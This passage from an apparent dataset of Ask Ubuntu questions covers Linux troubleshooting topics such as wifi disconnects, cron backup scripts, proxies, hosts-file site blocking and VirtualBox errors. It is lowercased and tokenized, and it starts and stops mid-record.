5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1369.082799 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 1369.082805 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 1475.676205 ] wlan0 : deauthenticated from e8:40:40:73 : f2:51 ( reason : 252 ) [ 1475.691714 ] cfg80211 : calling crda to update world regulatory domain [ 1475.699688 ] cfg80211 : world regulatory domain updated : [ 1475.699697 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1475.699702 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1475.699707 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1475.699710 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 1475.699714 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1475.699717 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1478.730685 ] wlan0 : authenticate with e8:40:40 : df:55:21 [ 1478.734432 ] wlan0 : send auth to e8:40:40 : df:55:21 ( try 1/3 ) [ 1478.735859 ] wlan0 : authenticated [ 1478.736649 ] wlan0 : associate with e8:40:40 : df:55:21 ( try 1/3 ) [ 1478.740235 ] wlan0 : rx assocresp from e8:40:40 : df:55:21 ( capab=0x431 status=0 aid=14 ) [ 1478.742354 ] wlan0 : associated [ 1478.742418 ] cfg80211 : calling crda for country : us [ 1478.746067 ] cfg80211 : regulatory domain changed to country : us [ 1478.746071 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1478.746073 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 1478.746075 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 1478.746077 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1478.746079 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1478.746081 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1478.746083 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 1478.746084 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 1515.056229 ] wlan0 : deauthenticating from e8:40:40 : df:55:21 by local choice ( reason=3 ) [ 1515.063691 ] cfg80211 : calling crda to update world regulatory domain [ 1515.072822 ] cfg80211 : world regulatory domain updated : [ 1515.072826 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1515.072829 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1515.072831 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1515.072834 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 1515.072836 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1515.072838 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1517.988230 ] wlan0 : authenticate with e8:40:40 : df:55:2e [ 1517.992297 ] wlan0 : send auth to e8:40:40 : df:55:2e ( try 1/3 ) [ 1517.997058 ] wlan0 : authenticated [ 1517.997196 ] wlan0 : waiting for beacon from e8:40:40 : df:55:2e [ 1518.102741 ] wlan0 : associate with e8:40:40 : df:55:2e ( try 1/3 ) [ 1518.109021 ] wlan0 : rx assocresp from e8:40:40 : df:55:2e ( capab=0x11 status=0 aid=5 ) [ 1518.111267 ] wlan0 : associated [ 1518.111403 ] cfg80211 : calling crda for country : us [ 1518.119766 ] cfg80211 : regulatory domain changed to country : us [ 1518.119775 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1518.119780 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 1518.119784 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 1518.119788 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1518.119792 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1518.119795 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1518.119799 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 1518.119802 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 1664.181679 ] asus_wmi : unknown key 7a pressed [ 1839.423052 ] wlan0 : authenticate with e8:40:40 : df:55:21 [ 1839.427090 ] wlan0 : direct probe to e8:40:40 : df:55:21 ( try 1/3 ) [ 1839.428306 ] cfg80211 : calling crda to update world regulatory domain [ 1839.433970 ] cfg80211 : world regulatory domain updated : [ 1839.433975 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1839.433978 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1839.433980 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1839.433982 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 1839.433984 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1839.433985 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1839.629396 ] wlan0 : direct probe to e8:40:40 : df:55:21 ( try 2/3 ) [ 1839.833524 ] wlan0 : direct probe to e8:40:40 : df:55:21 ( try 3/3 ) [ 1840.037560 ] wlan0 : authentication with e8:40:40 : df:55:21 timed out [ 1840.180304 ] wlan0 : authenticate with e8:40:40 : df:55:2e [ 1840.182998 ] wlan0 : send auth to e8:40:40 : df:55:2e ( try 1/3 ) [ 1840.258938 ] wlan0 : authenticated [ 1840.261725 ] wlan0 : associate with e8:40:40 : df:55:2e ( try 1/3 ) [ 1840.265685 ] wlan0 : rx assocresp from e8:40:40 : df:55:2e ( capab=0x11 status=0 aid=5 ) [ 1840.268302 ] wlan0 : associated [ 1840.268527 ] cfg80211 : calling crda for country : us [ 1840.275845 ] cfg80211 : regulatory domain changed to country : us [ 1840.275855 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1840.275860 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 1840.275864 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 1840.275868 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1840.275872 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1840.275875 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1840.275879 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 1840.275883 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 2083.836601 ] wlan0 : deauthenticated from e8:40:40 : df:55:2e ( reason : 252 ) [ 2083.839098 ] cfg80211 : calling crda to update world regulatory domain [ 2083.845959 ] cfg80211 : world regulatory domain updated : [ 2083.845966 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 2083.845970 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2083.845974 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2083.845977 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 2083.845979 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2083.845982 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2083.982047 ] wlan0 : authenticate with e8:40:40:73 : f2:5e [ 2083.986732 ] wlan0 : send auth to e8:40:40:73 : f2:5e ( try 1/3 ) [ 2084.059524 ] wlan0 : authenticated [ 2084.062342 ] wlan0 : associate with e8:40:40:73 : f2:5e ( try 1/3 ) [ 2084.064863 ] wlan0 : rx assocresp from e8:40:40:73 : f2:5e ( capab=0x11 status=0 aid=8 ) [ 2084.067684 ] wlan0 : associated [ 2084.067856 ] cfg80211 : calling crda for country : us [ 2084.074586 ] cfg80211 : regulatory domain changed to country : us [ 2084.074592 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 2084.074596 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 2084.074599 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 2084.074602 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2084.074604 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2084.074607 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2084.074609 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 2084.074612 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 2110.680427 ] wlan0 : deauthenticating from e8:40:40:73 : f2:5e by local choice ( reason=3 ) [ 2110.705721 ] cfg80211 : calling crda to update world regulatory domain [ 2110.708682 ] cfg80211 : world regulatory domain updated : [ 2110.708685 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 2110.708687 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2110.708688 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2110.708690 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 2110.708691 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2110.708692 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2113.578170 ] wlan0 : authenticate with e8:40:40:73 : f2:5e [ 2113.581161 ] wlan0 : send auth to e8:40:40:73 : f2:5e ( try 1/3 ) [ 2113.582608 ] wlan0 : authenticated [ 2113.584011 ] wlan0 : associate with e8:40:40:73 : f2:5e ( try 1/3 ) [ 2113.587971 ] wlan0 : rx assocresp from e8:40:40:73 : f2:5e ( capab=0x11 status=0 aid=8 ) [ 2113.590012 ] wlan0 : associated [ 2113.590151 ] cfg80211 : calling crda for country : us [ 2113.593433 ] cfg80211 : regulatory domain changed to country : us [ 2113.593437 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 2113.593439 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 2113.593442 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 2113.593444 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2113.593446 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2113.593448 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2113.593450 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 2113.593452 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) i have already tried disabling the 802.11n as mentioned in intel centrino centrino advanced-n 6235 weak wireless reception or even doing it manually like : sudo rmmod iwlwifi sudo modprobe iwlwifi 11n_disable=1 both did not work . i even tried the power off feature for it like so : sudo iwconfig wlan0 power off also tried disabling ipv6 : echo `` net.ipv6.conf.all.disable_ipv6 = 1 '' | sudo tee -a /etc/sysctl.conf echo `` net.ipv6.conf.default.disable_ipv6 = 1 '' | sudo tee -a /etc/sysctl.conf echo `` net.ipv6.conf.lo.disable_ipv6 = 1 '' | sudo tee -a /etc/sysctl.conf and installing the linux-firmware and linux-firmware-nonfree packages .
502546	deploy a swift-storage in juju	deploying the swift-storage in a vnode after the status the result is this swift-storage-zone2 : charm : cs : trusty/swift-storage-2 exposed : false units : swift-storage-zone2/0 : agent-state : error agent-state-info : 'hook failed : `` install '' ' agent-version : 1.20.1 machine : `` 7 '' public-address : ccsvr1node8.maas someone knows why it gives me this error ? thanks
502548	problem in installing ubuntu14 along windows7	i have installed windows 7 now i want to install ubuntu 14 along windows7 but when i select option install along windows7 the next i see please remove any installation media and then press enter after enter there is start of my windows 7
502549	firefox/rekonq can not load audio on soundcloud and bandcamp	i run kubuntu 14.04 and can not listen to audio files from soundcloud or bandcamp . f.ex grooveshark or youtube work just fine . i already installed the newest version of flashplugin-installer . when i want to start a song , it seems to load , but then shuffles through the playlist without playing anything . with rekonq its the same . i also removed gnash , since this was mentioned to interfere . anybody having the same issues ? any ideas ?
502550	setting up a transparent proxy with ubuntu server	basically i have configured the server to take the internet on eth0 and pass it through squid out on eth1 , i think haha . i have also configured the dhcp server which is working fine , it 's distributing addresses to computers on eth1 but the port forwarding is n't working properly . the computers connected to the server can only access the local network and not the internet . i can get to the main router 's settings page at the beginning of the network although i ca n't because squid blocks access as it should lol so i get the access denied page but i know it works because before i setup squid the port forwarding forwarded to the router settings . i do n't know why it 's not working when i try to load google , it just times out and chrome says can not connect to internet .
502551	how to download 14.04 upgrade as iso	i am using 12.04 lts and now i want to upgrade to 14.04 i want to know , how to download the upgrade ( only the upgrade files ) and upgrade process . my upgrade manager program shows 12.10 upgrade only . so that 's why i am asking for another method . would please explain me.i am not an experienced ubuntu user , thank you !
502556	how to setup easystroke so that the strokes work outside of the easystroke window ?	i have ubuntu 14.04 and i have setup easystroke to start firefox with a simple mouse gesture , the only issue is the gesture will only work when i have easystroke open and i do the gesture inside the window . if i click hide or minimize or close easystroke program , the gesture no longer works . i can see the red line when i try to make the gesture but it doesnât open firefox . any ideas ? ?
502557	how can i recover data from a crashed installation ?	i had been using ubuntu 12 . the installation crashed and i am trying to get advice about fixing it in another post . currently , i have no graphics and can only boot to console mode . if the installation can’t be fixed , i’d like to , at least , recover my files . i tried to do this using a ubuntu 14 live cd but i could not copy any of the files because of the permissions attached to them . i am planning to remove the permissions by booting to console mode and using the following command : chmod 777 -r home . i’ll then use the live cd again to find and copy the files . any suggestions ?
502559	what are the risks if install a secondary desktop environment / interface on my ubuntu ?	i know i can install different desktop uis on ubuntu , but i am concerned because i read that there are sometimes risks like when the config files for one desktop environment are corrupted or modified by the secondary ( i think it was xfce and unity ) . i 've considered installing two oses in my vm , the latest ubuntu studio and ubuntu desktop 12.04 for performance reasons . this one looks like the most stable alternative but there would be a problem with having two workspaces . honestly , i like both unity and xfce , and i need only one instance of my project files . the second option is to install ubuntu studio which comes with xfce and then install unity 2d . however , i 'm concerned if one will break the other . what do you guys know about having drastically different desktop ui installed on one system ? what experiences and risks should i be concerned about ?
502563	too much space between icons on the gnome panel in gnome fallback ( compiz ) ubuntu 14.04	there 's too much space between the icons on the gnome panel , in the fallback session , here 's a screenshot . is there anything i can do to solve this ?
502565	openoffice headless	i want to install openoffice headless in ubuntu 14.04 . i previously successfully installed it ubuntu 13.04 using following commands : http : //www.openvpms.org/documentation/install-openoffice-headless-service-ubuntu but in ubuntu 14.04 when i try to install openoffice headless , it says that there is no package called openoffice headless . can anyone help me with this ? any kind of help is appreciated .
502571	how to export a gnumeric table into latex under ubuntu 14.04 ?	according to the gnumeric manual available at http : //www.fifi.org/doc/gnumeric-doc/html/c/ , latex 2e is one of the supported file formats , available via the save as ... dialog . using ubuntu 14.04 and having installed gnumeric from the ubuntu software center , i do not see the option to save as latex in the file type drop-down menu .
502579	wifi connectivity problems	after my computer awakens from the suspend mode or disconnected once from wifi by changing a network ie , i cant reconnect with any wifi . this worsened after trying to fix it . so now there is also a problem with the energy management . help msi u100 plus linux
502580	moving icon to the bottom of the launcher	how can i move the `` show desktop '' icon to the bottom of the launcher , right above/under the trash icon ? if that is not possible , then can i just replace `` trash '' with `` show desktop '' ? like changing the name , icon and the command to be executed when clicking that launcher .
502582	disable and enable certain websites automatically	as some sites like facebook are distracting to me , i have decited to edit /etc/hosts file in order to block ( temporarily ) those sites as an extra way to avoid these sites . as an example , my hosts file is like below : 127.0.0.1 localhost 127.0.1.1 user 127.0.0.1 www.facebook.com 127.0.0.1 www.youtube.com however , when i 'm home , i want to have access to those websites , and therefore i comment out those websites manually by opening the file again , and commenting one by one all the websites as shown below : 127.0.0.1 localhost 127.0.1.1 user # 127.0.0.1 www.facebook.com # 127.0.0.1 www.youtube.com how can i create a script that does exactly this job ? commenting out the websites that are included in the hosts file , and removing the comment when i want ?
502590	virtualbox error - failed to open a session for the virtual machine linuxemulator	so i 'm trying to run linux on windows 8 and cygwin did n't offer all the functionality i wanted . i decided to install a virtualbox to create a linux operating system to allow me added functionality for the command line . i am using oracle vm virtual box . i have also installed ubuntu . i followed the instructions from this website http : //www.codeproject.com/articles/324077/runlinuxvirtualbox i successfully made it to the install linux on the virtual machine tab when i encountered this error mesage . virtualbox - error failed to open a session for the virtual machine linuxemulator . the virtual machine 'linuxemulator ' has terminated unexectedly during startup with error code 1 . details result code : e_fail ( 0x80004005 ) component : machine interface : imachine { 480cf695-2d8d-4256-9c7c-cce4184fa048 } i wanted to ask you experts for advice here . here are some statistics on the virtual machine i created name : linux emulator operating system : linux version : ubuntu ( 32 bit ) memory allocation : 512mb ram hard drive : 8gb i also get another error when trying to start my virtual machine . virtualbox - error in supr3hardenedwinrespawn error relaunching virtualbox vm process : 5
502592	ubuntu 14.04 not running bash scripts in /etc/cron.daily	i have a few scripts ( that currently run in a centos system ) i have moved to a new ubuntu 14.04 system . these scripts are in the /etc/cron.daily to run once a day . these scripts are to run at the system level as root . if i run the scripts with the `` sudo '' command or run as root ( sudo -i ) , the scripts do exactly what they are supposed to . thanks b problem : cron daily runs but does not activate my bash scripts . i can not find any record of cron attempting to run the script file/folder permissions : /etc/cron.daily = root : root 755 etc/cron.daily/bash.sh = root : root 755 var/log/slog ( log file for script ) = root : root 644 output of syslog : jul 25 10:39:45 system1 cron [ 24337 ] : ( cron ) info ( pidfile fd = 3 ) jul 25 10:39:45 system1 cron [ 24338 ] : ( cron ) startup ( fork ok ) jul 25 10:39:45 system1 cron [ 24338 ] : ( cron ) info ( skipping @ reboot jobs -- not system startup ) jul 25 10:40:01 system1 cron [ 24341 ] : ( smmsp ) cmd ( test -x /etc/init.d/sendmail & & /usr/share/sendmail/sendmail cron-msp ) jul 25 10:41:17 system1 cron [ 24375 ] : ( cron ) info ( pidfile fd = 3 ) jul 25 10:41:17 system1 cron [ 24376 ] : ( cron ) startup ( fork ok ) jul 25 10:41:17 system1 cron [ 24376 ] : ( cron ) info ( skipping @ reboot jobs -- not system startup ) jul 25 10:43:37 system1 crontab [ 24413 ] : ( root ) list ( root ) jul 25 10:45:01 system1 cron [ 24415 ] : ( root ) cmd ( test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) ) jul 25 11:00:01 system1 cron [ 24620 ] : ( smmsp ) cmd ( test -x /etc/init.d/sendmail & & /usr/share/sendmail/sendmail cron-msp ) jul 25 11:17:01 system1 cron [ 25239 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) jul 25 11:17:37 system1 crontab [ 25243 ] : ( root ) list ( root ) jul 25 11:17:51 system1 crontab [ 25246 ] : ( root ) begin edit ( root ) jul 25 11:18:10 system1 crontab [ 25246 ] : ( root ) end edit ( root ) jul 25 11:20:01 system1 cron [ 25308 ] : ( smmsp ) cmd ( test -x /etc/init.d/sendmail & & /usr/share/sendmail/sendmail cron-msp ) output when script is run manually : jul 25 11:24:57 system1 sendmail [ 25398 ] : s6pfovdy025398 : from=user1 , size=601 , class=0 , nrcpts=1 , msgid= < 201407251524.s6pfovdy025398 @ system1.domain.local > , relay=root @ localhost jul 25 11:24:57 system1 sm-mta [ 25399 ] : s6pfovv7025399 : from= < user1 @ system1.domain.local > , size=843 , class=0 , nrcpts=1 , msgid= < 201407251524.s6pfovdy025398 @ system1.domain.local > , proto=esmtp , daemon=mta-v4 , relay=localhost [ 127.0.0.1 ] jul 25 11:24:57 system1 sendmail [ 25398 ] : s6pfovdy025398 : to=user2 @ domain.local , ctladdr=user1 ( 251679327/251679327 ) , delay=00:00:00 , xdelay=00:00:00 , mailer=relay , pri=30601 , relay= [ 127.0.0.1 ] [ 127.0.0.1 ] , dsn=2.0.0 , stat=sent ( s6pfovv7025399 message accepted for delivery ) jul 25 11:24:59 system1 sm-mta [ 25401 ] : s6pfovv7025399 : to= < user2 @ domain.local > , ctladdr= < user3 @ system1.domain.local > ( 251679327/251679327 ) , delay=00:00:02 , xdelay=00:00:02 , mailer=relay , pri=120843 , relay=mailserver.domain.local . [ 100.100.100.1 ] , dsn=2.0.0 , stat=sent ( < 201407251524.s6pfovdy025398 @ system1.domain.local > [ internalid=3393981 ] queued mail for delivery ) jul 25 11:40:01 syatem1 cron [ 25542 ] : ( smmsp ) cmd ( test -x /etc/init.d/sendmail & & /usr/share/sendmail/sendmail cron-msp ) one of the bash scripts : # ! /bin/bash # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # created by : brandt winchell # # date modified : 04-13-2014 # # version : 2.0 # # scriptfunction > # # create folder directories for logs & backups # # remove local backups older than $ retaindays # # transfer the backup files from the vcsa to the local system # # verify the backup files exists and are not empty # # mail a report ( include error report if problem exists ) # # changelog > # # 2.0 added mail functionality for report ! ! ( sendmail needs to be # # configured on local machine . refer to `` sendmail -- help '' ) # # fixed file size check logic # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # variables sysname= $ ( hostname -s ) remotesysname= '' system1 '' remotefqdn= '' system1.domain.local '' day=`date + % d` month=`date + % m` year=`date + % y` datemod= '' $ day $ month $ year '' remotebkdir1= '' /storage/db/backups '' localbkdir= '' /storage/backups '' bkfile= '' $ remotesysname '' _ '' $ datemod '' bklog= '' /var/log/slog '' bklog_dir= '' /var/log '' errlog= '' $ remotebkdir1/ $ remotesysname '' _ '' $ datemod.err '' retaindays= '' 21 '' mailenabled=true # send email of reports sender= '' user2 @ domian.local '' recipient= $ 2 subject= $ 1 boundary= '' eof_fileboundry '' mail_body= $ 3 declare -a attachments # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # function build_message get_mimetype ( ) { # warning : assumes that the passed file exists echo `` file in array followed by mime-type : $ 1 '' > > $ bklog 2 > & 1 file -- mime-type `` $ 1 '' | sed 's/ . * : // ' > > $ bklog 2 > & 1 } # build headers build_message ( ) { printf ' % s\n ' `` from : $ sender to : $ recipient subject : $ subject mime-version : 1.0 content-type : multipart/mixed ; boundary=\ '' $ boundary\ '' -- $ { boundary } content-type : text/html ; charset=\ '' us-ascii\ '' content-transfer-encoding : 7bit content-disposition : inline # mailbody $ mail_body '' # now loop over the attachments , guess the type # and produce the corresponding part , encoded base64 for file in `` $ { attachments [ @ ] } '' ; do [ ! -f `` $ file '' ] & & echo `` warning : attachment $ file not found , skipping '' > > $ bklog 2 > & 1 & & continue mimetype= $ ( get_mimetype `` $ file '' ) printf ' % s\n ' `` -- $ { boundary } content-type : $ mimetype content-transfer-encoding : base64 content-disposition : attachment ; filename=\ '' $ file\ '' '' base64 `` $ file '' echo done # print last boundary with closing -- printf ' % s\n ' `` -- $ { boundary } -- '' echo `` mail debug : '' > > $ bklog 2 > & 1 echo `` to : $ recipient '' > > $ bklog 2 > & 1 echo `` from : $ sender '' > > $ bklog 2 > & 1 echo `` mail body : $ mail_body '' > > $ bklog 2 > & 1 } # function end # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # create log file and error log , if one does not exist # create backup log directory and file , if it does not exist if [ ! -d `` $ bklog '' ] ; then mkdir -p $ bklog_dir touch $ bklog > > $ bklog 2 > & 1 fi # create backup directory , if it does not exist if [ ! -d `` $ localbkdir '' ] ; then mkdir -p $ localbkdir > > $ bklog 2 > & 1 fi # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # begin logging process ( begin log ) echo `` **************************************************************************** '' > > $ bklog 2 > & 1 echo `` `date` : script $ 0 starting '' > > $ bklog 2 > & 1 echo `` `whoami` : user running script '' > > $ bklog 2 > & 1 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # remove any local files older than $ retaindays days old echo `` `date` : removing backups or error logs older than $ retaindays '' > > $ bklog 2 > & 1 find $ localbkdir/ $ remotesysname -name $ remotesysname'*.tar ' -mtime + $ retaindays -exec rm -f { } \ ; > > $ bklog 2 > & 1 find $ localbkdir/ $ remotesysname -name $ remotesysname'*.err ' -mtime + $ retaindays -exec rm -f { } \ ; > > $ bklog 2 > & 1 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # check to verify backup file is not empty echo `` `date` : verifying backup file is not empty '' > > $ bklog 2 > & 1 # ( check file on remote system for file size ) results= '' '' results= $ ( ssh root @ $ remotefqdn `` /usr/bin/du $ remotebkdir1/ $ bkfile.tar '' | awk ' { print $ 1 } ' ) # ( obtain file size ) echo `` db backup file // $ remotefqdn/ $ remotebkdir1/ $ bkfile size ( bytes ) : $ results '' > > $ bklog 2 > & 1 if [ `` $ results '' \ > 0 ] ; then # ( file has content ) echo `` backup file from m : $ month d : $ day y : $ year has content . '' > > $ bklog 2 > & 1 else # ( file is empty ) echo `` backup file from m : $ month d : $ day y : $ year is empty . check the error log stored with the backup '' > > $ bklog 2 > & 1 echo `` process has ended with error . check log '' # send mail report with error report attachments= ( `` $ bklog '' ) [ [ -z $ 1 ] ] & & subject= '' : - ( error : backup report for $ remotefqdn from $ sysname '' [ [ -z $ 2 ] ] & & recipient= '' user2 @ domain.local '' [ [ -z $ 3 ] ] & & mail_body= '' backup file is empty or missing for $ remotefqdn . check the error log attached or error log at // $ remotefqdn $ errlog . '' if [ `` $ mailenabled '' == true ] ; then echo `` sending mail with error report '' > > $ bklog 2 > & 1 build_message | sendmail -t -oi fi exit 1 # ( stop process and exit script ) fi # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # transfer backup files and error logs echo `` `date` : transferring $ bkfile and $ errlog from $ remotesysname to $ sysname '' > > $ bklog 2 > & 1 # make the directory structure if it does not exist if [ ! -d `` $ localbkdir/ $ remotesysname '' ] ; then mkdir -p $ localbkdir/ $ remotesysname > > $ bklog 2 > & 1 fi # transfer the $ bkfile.tar file ( db backup ) exitstatus1= '' '' scp root @ $ remotefqdn : $ remotebkdir1/ $ bkfile.tar $ localbkdir/ $ remotesysname/ $ bkfile.tar > > $ bklog 2 > & 1 # ( copy the backup file ) exitstatus1= $ ? if [ `` $ exitstatus1 '' -ne 0 ] ; then # ( transfer process 